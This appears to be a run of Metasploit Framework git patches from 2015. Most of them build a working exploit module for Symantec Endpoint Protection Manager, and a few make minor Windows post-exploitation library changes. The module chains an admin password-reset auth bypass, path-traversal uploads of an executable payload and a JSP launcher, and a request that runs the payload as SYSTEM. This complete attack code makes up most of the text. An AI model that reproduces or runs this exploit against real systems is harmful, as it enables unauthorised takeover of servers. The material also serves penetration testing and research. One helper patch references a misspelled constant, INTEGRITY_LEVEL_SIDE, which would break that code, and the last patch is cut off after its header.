diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
new file mode 100644
index 0000000000..ead0c20bc8
--- /dev/null
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -0,0 +1,103 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Symantec Endpoint Protection Manager Auth Bypass and RCE",
+      'Description'    => %q{
+      This module exploits two separate vulnerabilities in Symantec Endpoint Protection Manager
+      in order to achieve a remote shell on the box.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'bperry', #metasploit module
+          'CodeWhiteSec' #discovery
+        ],
+      'References'     =>
+        [
+          ['CVE', '2015-1486'],
+          ['CVE', '2015-1487'],
+          ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
+        ],
+      'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Automatic', {
+            'Arch' => ARCH_X86,
+            'Payload' => {
+              'DisableNops' => true
+            }
+          } ],
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => 'Jul 31 2015',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptBool.new('SSL', [true, 'Use SSL', true]),
+          OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
+        ], self.class)
+  end
+
+  def exploit
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
+      'method' => 'POST',
+      'vars_post' => {
+        'ActionType' => 'ResetPassword',
+        'UserID' => 'admin',
+        'Domain' => ''
+      }
+    })
+
+    cookie = res.get_cookies
+
+    p cookie
+    exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\fdsa.exe").getInputStream()).useDelimiter("\\\\A").next()%>'
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
+      'method' => 'POST',
+      'vars_get' => {
+        'ActionType' => 'BinaryFile',
+        'Action' => 'UploadPackage',
+        'PackageFile' => '../../../tomcat/webapps/ROOT/fdsa.exe',
+        'KnownHosts' => '.'
+      },
+      'data' => payload.encoded_exe,
+      'cookie' => cookie,
+      'ctype' => ''
+    })
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
+      'method' => 'POST',
+      'vars_get' => {
+        'ActionType' => 'BinaryFile',
+        'Action' => 'UploadPackage',
+        'PackageFile' => '../../../tomcat/webapps/ROOT/rewq.jsp',
+        'KnownHosts' => '.'
+      },
+      'data' => exec,
+      'cookie' => cookie,
+      'ctype' => ''
+    })
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'rewq.jsp')
+    })
+  end
+end

From 2bfc8e59be106124fa49ac08cbccd7f684204a7f Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Sat, 1 Aug 2015 16:43:31 -0500
Subject: [PATCH 0926/1013] remove printline

---
 modules/exploits/windows/http/sepm_auth_bypass_rce.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index ead0c20bc8..e74a2e6018 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -65,7 +65,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
     cookie = res.get_cookies
 
-    p cookie
     exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\fdsa.exe").getInputStream()).useDelimiter("\\\\A").next()%>'
 
     res = send_request_cgi({

From 47e86000eeb676a94add3c3021c52a79eae13269 Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Sat, 1 Aug 2015 16:50:06 -0500
Subject: [PATCH 0927/1013] randomize the file names

---
 .../exploits/windows/http/sepm_auth_bypass_rce.rb    | 12 ++++++++----
 1 file changed, 8 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index e74a2e6018..ebdcfdceec 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -53,6 +53,10 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
+
+    meterp = Rex::Text.rand_text_alpha(10)
+    jsp = Rex::Text.rand_text_alpha(10)
+
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
@@ -65,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     cookie = res.get_cookies
 
-    exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\fdsa.exe").getInputStream()).useDelimiter("\\\\A").next()%>'
+    exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\'+meterp+'.exe").getInputStream()).useDelimiter("\\\\A").next()%>'
 
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
@@ -73,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'vars_get' => {
         'ActionType' => 'BinaryFile',
         'Action' => 'UploadPackage',
-        'PackageFile' => '../../../tomcat/webapps/ROOT/fdsa.exe',
+        'PackageFile' => "../../../tomcat/webapps/ROOT/#{meterp}.exe",
         'KnownHosts' => '.'
       },
       'data' => payload.encoded_exe,
@@ -87,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'vars_get' => {
         'ActionType' => 'BinaryFile',
         'Action' => 'UploadPackage',
-        'PackageFile' => '../../../tomcat/webapps/ROOT/rewq.jsp',
+        'PackageFile' => "../../../tomcat/webapps/ROOT/#{jsp}.jsp",
         'KnownHosts' => '.'
       },
       'data' => exec,
@@ -96,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     res = send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, 'rewq.jsp')
+      'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
     })
   end
 end

From de47f4752be831f29def7214c47f81f261bd9d3e Mon Sep 17 00:00:00 2001
From: Roberto Soares <robertoespreto@gmail.com>
Date: Sat, 1 Aug 2015 18:54:01 -0300
Subject: [PATCH 0928/1013] Added feature to add color background (Prompt)

---
 lib/rex/ui/text/color.rb | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/lib/rex/ui/text/color.rb b/lib/rex/ui/text/color.rb
index e5265f53c2..1a412d53ed 100644
--- a/lib/rex/ui/text/color.rb
+++ b/lib/rex/ui/text/color.rb
@@ -75,6 +75,15 @@ module Color
     str.gsub!(/%und/, pre_color+colorize('underline')+post_color)
     str.gsub!(/%bld/, pre_color+colorize('bold')+post_color)
     str.gsub!(/%clr/, pre_color+colorize('clear')+post_color)
+    # Background Color
+    str.gsub!(/%bgblu/, pre_color+colorize('on_blue')+post_color)
+    str.gsub!(/%bgyel/, pre_color+colorize('on_yellow')+post_color)
+    str.gsub!(/%bggrn/, pre_color+colorize('on_green')+post_color)
+    str.gsub!(/%bgmag/, pre_color+colorize('on_magenta')+post_color)
+    str.gsub!(/%bgblk/, pre_color+colorize('on_black')+post_color)
+    str.gsub!(/%bgred/, pre_color+colorize('on_red')+post_color)
+    str.gsub!(/%bgcyn/, pre_color+colorize('on_cyan')+post_color)
+    str.gsub!(/%bgwhi/, pre_color+colorize('on_white')+post_color)
 
     str
   end

From 5bcb63476dee7abdb893e64cf20959f590503991 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 1 Aug 2015 23:10:51 +0100
Subject: [PATCH 0929/1013] Add high integrity level check

---
 lib/msf/core/post/windows/priv.rb | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb
index aca85738b4..49f3fb76d3 100644
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -8,6 +8,7 @@ module Msf::Post::Windows::Priv
   include Msf::Post::Windows::Registry
 
   INTEGRITY_LEVEL_SID = {
+      :untrusted => 'S-1-16-4096',
       :low => 'S-1-16-4096',
       :medium => 'S-1-16-8192',
       :high => 'S-1-16-12288',
@@ -147,6 +148,14 @@ module Msf::Post::Windows::Priv
     end
   end
 
+  #
+  # Returns true if in a high integrity, or system, service
+  #
+  def is_high_integrity?
+    il = get_integrity_level
+    (il == INTEGRITY_LEVEL_SID[:high] || il == INTEGRITY_LEVEL_SIDE[:system])
+  end
+
   #
   # Returns the output of whoami /groups
   #

From 2d9bc644575ce5af952af861ffd064cca2439ffb Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 1 Aug 2015 23:11:09 +0100
Subject: [PATCH 0930/1013] Fix WMIC Post Library for SYSTEM

SYSTEM doesn't have a proper clipboard?
---
 lib/msf/core/post/windows/wmic.rb | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/lib/msf/core/post/windows/wmic.rb b/lib/msf/core/post/windows/wmic.rb
index a9db0fc3c5..580e0b3dca 100644
--- a/lib/msf/core/post/windows/wmic.rb
+++ b/lib/msf/core/post/windows/wmic.rb
@@ -7,6 +7,7 @@ module Windows
 module WMIC
 
   include Msf::Post::File
+  include Msf::Post::Windows::Priv
   include Msf::Post::Windows::ExtAPI
 
   def initialize(info = {})
@@ -32,13 +33,13 @@ module WMIC
       end
     end
 
-    if extapi
+    if extapi && !is_system?
       session.extapi.clipboard.set_text("")
       wcmd = "wmic #{wmic_user_pass_string}/output:CLIPBOARD /INTERACTIVE:off /node:#{server} #{query}"
     else
-      tmp = session.fs.file.expand_path("%TEMP%")
+      tmp = get_env('TEMP')
       out_file = "#{tmp}\\#{Rex::Text.rand_text_alpha(8)}"
-      wcmd = "wmic #{wmic_user_pass_string}/output:#{out_file} /INTERACTIVE:off /node:#{server} #{query}"
+      wcmd = "cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe #{wmic_user_pass_string}/output:#{out_file} /INTERACTIVE:off /node:#{server} #{query}"
     end
 
     vprint_status("[#{server}] #{wcmd}")
@@ -48,9 +49,9 @@ module WMIC
     session.railgun.kernel32.WaitForSingleObject(ps.handle, (datastore['TIMEOUT'] * 1000))
     ps.close
 
-    if extapi
+    if extapi && !is_system?
       result = session.extapi.clipboard.get_data.first
-      if result[1].has_key? 'Text'
+      if result && result[1] && result[1].has_key?('Text')
         result_text = result[1]['Text']
       else
         result_text = ""

From 6f3118390435dce9032f9144006398f4d25ef750 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 1 Aug 2015 23:13:05 +0100
Subject: [PATCH 0931/1013] Fix VSS Persistance to check integrity level

---
 modules/exploits/windows/local/vss_persistence.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/modules/exploits/windows/local/vss_persistence.rb b/modules/exploits/windows/local/vss_persistence.rb
index a869680f6a..f02c1e5a6c 100644
--- a/modules/exploits/windows/local/vss_persistence.rb
+++ b/modules/exploits/windows/local/vss_persistence.rb
@@ -11,7 +11,6 @@ class Metasploit3 < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Msf::Post::File
-  include Msf::Post::Windows::Priv
   include Msf::Post::Windows::ShadowCopy
   include Msf::Post::Windows::Registry
   include Msf::Exploit::EXE
@@ -66,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Local
       return
     end
 
-    if is_uac_enabled?
+    unless is_high_integrity?
       print_error("This module requires UAC to be bypassed first")
       return
     end

From ef33f36bda86bbd0f4378c74fed4c7b6f28080ad Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Sat, 1 Aug 2015 23:20:00 +0100
Subject: [PATCH 0932/1013] Remove untrusted il

---
 lib/msf/core/post/windows/priv.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb
index 49f3fb76d3..d6b6e578fa 100644
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -8,7 +8,6 @@ module Msf::Post::Windows::Priv
   include Msf::Post::Windows::Registry
 
   INTEGRITY_LEVEL_SID = {
-      :untrusted => 'S-1-16-4096',
       :low => 'S-1-16-4096',
       :medium => 'S-1-16-8192',
       :high => 'S-1-16-12288',

From 272d75e437fc2a0ea45f89f6892491880a28a857 Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Sat, 1 Aug 2015 17:58:41 -0500
Subject: [PATCH 0933/1013] check res before calling get_cookies

---
 modules/exploits/windows/http/sepm_auth_bypass_rce.rb | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index ebdcfdceec..02da508571 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -67,6 +67,10 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
 
+    unless res
+      fail_with(Failure::Unknown, 'The server did not respond in an expected way')
+    end
+
     cookie = res.get_cookies
 
     exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\'+meterp+'.exe").getInputStream()).useDelimiter("\\\\A").next()%>'

From e70ec8c07b69f3c253d8af719b110a7e7d5cb6df Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Sat, 1 Aug 2015 18:00:35 -0500
Subject: [PATCH 0934/1013] no need to store res for the later requests

---
 modules/exploits/windows/http/sepm_auth_bypass_rce.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index 02da508571..74002283de 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\'+meterp+'.exe").getInputStream()).useDelimiter("\\\\A").next()%>'
 
-    res = send_request_cgi({
+    send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
       'vars_get' => {
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'ctype' => ''
     })
 
-    res = send_request_cgi({
+    send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
       'vars_get' => {
@@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'ctype' => ''
     })
 
-    res = send_request_cgi({
+    send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
     })
   end

From 12ac6d81fad1be2b310f6ef0d860d6c733c59536 Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Sun, 2 Aug 2015 08:17:12 -0500
Subject: [PATCH 0935/1013] add markus as the discoverer specifically

---
 modules/exploits/windows/http/sepm_auth_bypass_rce.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index 74002283de..d4016a267d 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -22,7 +22,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Author'         =>
         [
           'bperry', #metasploit module
-          'CodeWhiteSec' #discovery
+          'Markus Wulftange' #discovery
         ],
       'References'     =>
         [

From a33dff637d7219f67e6bf138b56d0b4e6a8d9e28 Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Sun, 2 Aug 2015 08:31:03 -0500
Subject: [PATCH 0936/1013] exploit cve 2015-1489 to get SYSTEM

---
 modules/exploits/windows/http/sepm_auth_bypass_rce.rb | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index d4016a267d..a66b8a9fa8 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "Symantec Endpoint Protection Manager Auth Bypass and RCE",
       'Description'    => %q{
-      This module exploits two separate vulnerabilities in Symantec Endpoint Protection Manager
-      in order to achieve a remote shell on the box.
+      This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
+      in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           ['CVE', '2015-1486'],
           ['CVE', '2015-1487'],
+          ['CVE', '2015-1489'],
           ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
         ],
       'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
@@ -41,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
             }
           } ],
         ],
-      'Privileged'     => false,
+      'Privileged'     => true,
       'DisclosureDate' => 'Jul 31 2015',
       'DefaultTarget'  => 0))
 
@@ -73,7 +74,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
     cookie = res.get_cookies
 
-    exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\'+meterp+'.exe").getInputStream()).useDelimiter("\\\\A").next()%>'
+    exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
+<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
+    }
 
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),

From f7ceec36d0ea0c447b018a7df7665c2846bd81c5 Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Sun, 2 Aug 2015 08:59:36 -0500
Subject: [PATCH 0937/1013] set default RPORT and SSL

---
 modules/exploits/windows/http/sepm_auth_bypass_rce.rb | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index a66b8a9fa8..a3804cd1aa 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -32,6 +32,9 @@ class Metasploit3 < Msf::Exploit::Remote
           ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
         ],
       'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
+      'DefaultOptions' => {
+        'SSL' => true
+      },
       'Platform'       => 'win',
       'Targets'        =>
         [
@@ -48,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
       register_options(
         [
-          OptBool.new('SSL', [true, 'Use SSL', true]),
+          Opt::RPORT(8443),
           OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
         ], self.class)
   end

From fe20bc88ad3222f9293981c57d38c5767af58b54 Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Sun, 2 Aug 2015 11:37:06 -0500
Subject: [PATCH 0938/1013] remove badchars

---
 modules/exploits/windows/http/sepm_auth_bypass_rce.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index a3804cd1aa..741b216e60 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Exploit::Remote
           ['CVE', '2015-1489'],
           ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
         ],
-      'Payload'        => { 'BadChars' => "\x0d\x0a\x00" },
+      'Payload'        => { 'BadChars' => "" },
       'DefaultOptions' => {
         'SSL' => true
       },

From a534008ba67bb00f0176b5633826278f0493ca20 Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Sun, 2 Aug 2015 15:03:59 -0500
Subject: [PATCH 0939/1013] add some status lines

---
 modules/exploits/windows/http/sepm_auth_bypass_rce.rb | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index 741b216e60..5a3b39fe0e 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -61,6 +61,8 @@ class Metasploit3 < Msf::Exploit::Remote
     meterp = Rex::Text.rand_text_alpha(10)
     jsp = Rex::Text.rand_text_alpha(10)
 
+    print_status("Getting cookie")
+
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
@@ -81,6 +83,7 @@ class Metasploit3 < Msf::Exploit::Remote
 <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
     }
 
+    print_status("Uploading payload...")
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
@@ -95,6 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'ctype' => ''
     })
 
+    print_status("Uploading JSP page to execute the payload...")
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
@@ -109,6 +113,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'ctype' => ''
     })
 
+    print_status("Executing payload. Manual cleanup will be required.")
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
     })

From 830aee8aa5008689f51cc1bd963938f89d9f909a Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Sun, 2 Aug 2015 15:22:40 -0500
Subject: [PATCH 0940/1013] check if cookie is actually returned, and if not,
 fail

---
 modules/exploits/windows/http/sepm_auth_bypass_rce.rb | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index 5a3b39fe0e..20516f8a20 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -79,6 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote
 
     cookie = res.get_cookies
 
+    if not cookie || cookie == ''
+      fail_with(Failure::Unknown, 'The server did not return a cookie to use in the later requests.')
+    end
+
     exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
 <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
     }

From a33724667c896b5341b850c3bf2844ab7b9fdfec Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Sun, 2 Aug 2015 16:36:41 -0500
Subject: [PATCH 0941/1013] small code cleanup

---
 modules/exploits/windows/http/sepm_auth_bypass_rce.rb | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)

diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index 20516f8a20..63c4893eb1 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -5,11 +5,10 @@
 
 require 'msf/core'
 
-class Metasploit3 < Msf::Exploit::Remote
+class Metasploit4 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::FileDropper
 
   def initialize(info={})
     super(update_info(info,
@@ -31,7 +30,6 @@ class Metasploit3 < Msf::Exploit::Remote
           ['CVE', '2015-1489'],
           ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
         ],
-      'Payload'        => { 'BadChars' => "" },
       'DefaultOptions' => {
         'SSL' => true
       },
@@ -57,7 +55,6 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
-
     meterp = Rex::Text.rand_text_alpha(10)
     jsp = Rex::Text.rand_text_alpha(10)
 

From 527eaea6ecc058fdaaa6c03a4cc3900309144aa7 Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Sun, 2 Aug 2015 18:25:17 -0500
Subject: [PATCH 0942/1013] single quotes and some error handling

---
 .../windows/http/sepm_auth_bypass_rce.rb         | 16 ++++++++++++----
 1 file changed, 12 insertions(+), 4 deletions(-)

diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index 63c4893eb1..9ee34b77a0 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -84,8 +84,8 @@ class Metasploit4 < Msf::Exploit::Remote
 <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
     }
 
-    print_status("Uploading payload...")
-    send_request_cgi({
+    print_status('Uploading payload...')
+    res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
       'vars_get' => {
@@ -99,8 +99,12 @@ class Metasploit4 < Msf::Exploit::Remote
       'ctype' => ''
     })
 
+    unless res && res.code == 200
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
+    end
+
     print_status("Uploading JSP page to execute the payload...")
-    send_request_cgi({
+    res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
       'method' => 'POST',
       'vars_get' => {
@@ -114,7 +118,11 @@ class Metasploit4 < Msf::Exploit::Remote
       'ctype' => ''
     })
 
-    print_status("Executing payload. Manual cleanup will be required.")
+    unless res && res.code == 200
+      fail_with(Failure::Unknown, 'Server did not respond in an expected way.')
+    end
+
+    print_status('Executing payload. Manual cleanup will be required.')
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp")
     })

From 06754c36a4346afacdb616f86a585bbd7431ad06 Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Sun, 2 Aug 2015 18:51:23 -0500
Subject: [PATCH 0943/1013] unless, not if not

---
 modules/exploits/windows/http/sepm_auth_bypass_rce.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index 9ee34b77a0..4e27acc1a1 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -76,7 +76,7 @@ class Metasploit4 < Msf::Exploit::Remote
 
     cookie = res.get_cookies
 
-    if not cookie || cookie == ''
+    unless cookie || cookie == ''
       fail_with(Failure::Unknown, 'The server did not return a cookie to use in the later requests.')
     end
 

From 74ed8cf0c96a2b1d271ea64ec8555b5f154de9ec Mon Sep 17 00:00:00 2001
From: Brandon Perry <bperry.volatile@gmail.com>
Date: Sun, 2 Aug 2015 18:57:13 -0500
Subject: [PATCH 0944/1013] actually that didn't work

---
 modules/exploits/windows/http/sepm_auth_bypass_rce.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index 4e27acc1a1..06e9a54757 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
